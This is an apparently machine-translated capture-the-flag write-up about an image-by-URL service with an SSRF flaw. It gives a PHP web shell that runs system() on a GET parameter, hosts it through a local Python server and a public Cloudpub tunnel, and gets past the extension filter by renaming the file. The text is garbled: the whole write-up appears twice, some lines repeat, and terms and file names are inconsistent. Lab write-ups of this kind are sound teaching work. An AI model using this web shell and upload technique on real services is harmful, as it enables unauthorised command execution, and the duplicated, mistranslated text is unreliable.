Entry
In general, I do not make WriteWP's on the tasks that already have it on the platform. However, after my decision, I decided to read it and I did not like it very much, there is no information that is why the newcomer can put a deadlock in, so here I will write in great detail step by step.
Reconnaissance
We see a service that allows you to view photos available by link, do not go to the fortune teller - here SSRF. Let's try to upload some random picture for example.
The service works, now let's try to download the script to PHP to get RCCE.
The service works, now let's try to download the script to PHP to get RCCE.
Exploitation
We create a document on the desktop rcce.php and insert a simple shell:
PHP:
<?php
system($_GET['cmd']);
?>
Now, we need to load it on the host somehow so that the service can read it, here I will write about what was not mentioned in the official writeup. For the publicity of our exploit will need a service clo from Cloudpub. We register there, take a token, download the utility clo and install it.
Unpacking:
Code:
tar -zxfv clo-{VERSION}-stable-linux-x86_64.tar.gz
Installation:
Code:
mv clo /usr/bin
Now we'll need a python to create a local tunnel. In the directory where our rce.php runs the terminal and call the python server:
Code:
python3 -m http.server 9090
Great, now if you go to the browser and write http://localhost:9090/, then we will get into the working directory through the browser.
Now we forward this tunnel with clo so that it is publicly available.
Code:
# Don't forget to bind the token: clo set token {TOKEN}
clo publish http 9090
Now the service will be able to read our file, let him send it.
The service swears that the file extension is unacceptable, apparently there is some kind of filtering, let's try to change the name of the file to .png.
The image has successfully loaded, let's try to use the cmed variable that we have set up before. For convenience, let’s move to Burp Suite. The conclusion is empty, let's try to change to .txt.
We see that it helped. Now we need to read the source of the project. But just a team cat index.php, we will not do, so let's encode it in the URL encoding.
And now, the flag is here!
In general, I do not make WriteWP's on the tasks that already have it on the platform. However, after my decision, I decided to read it and I did not like it very much, there is no information that is why the newcomer can put a deadlock in, so here I will write in great detail step by step.
Reconnaissance
We see a service that allows you to view photos available by link, do not go to the fortune teller - here SSRF. Let's try to upload some random picture for example.
The service works, now let's try to download the script to PHP to get RCCE.
The service works, now let's try to download the script to PHP to get RCCE.
Exploitation
We create a document on the desktop rcce.php and insert a simple shell:
PHP:
<?php
system($_GET['cmd']);
?>
Now, we need to load it on the host somehow so that the service can read it, here I will write about what was not mentioned in the official writeup. For the publicity of our exploit will need a service clo from Cloudpub. We register there, take a token, download the utility clo and install it.
Unpacking:
Code:
tar -zxfv clo-{VERSION}-stable-linux-x86_64.tar.gz
Installation:
Code:
mv clo /usr/bin
Now we'll need a python to create a local tunnel. In the directory where our rce.php runs the terminal and call the python server:
Code:
python3 -m http.server 9090
Great, now if you go to the browser and write http://localhost:9090/, then we will get into the working directory through the browser.
Now we forward this tunnel with clo so that it is publicly available.
Code:
# Don't forget to bind the token: clo set token {TOKEN}
clo publish http 9090
Now the service will be able to read our file, let him send it.
The service swears that the file extension is unacceptable, apparently there is some kind of filtering, let's try to change the name of the file to .png.
The image has successfully loaded, let's try to use the cmed variable that we have set up before. For convenience, let’s move to Burp Suite. The conclusion is empty, let's try to change to .txt.
We see that it helped. Now we need to read the source of the project. But just a team cat index.php, we will not do, so let's encode it in the URL encoding.
And now, the flag is here!
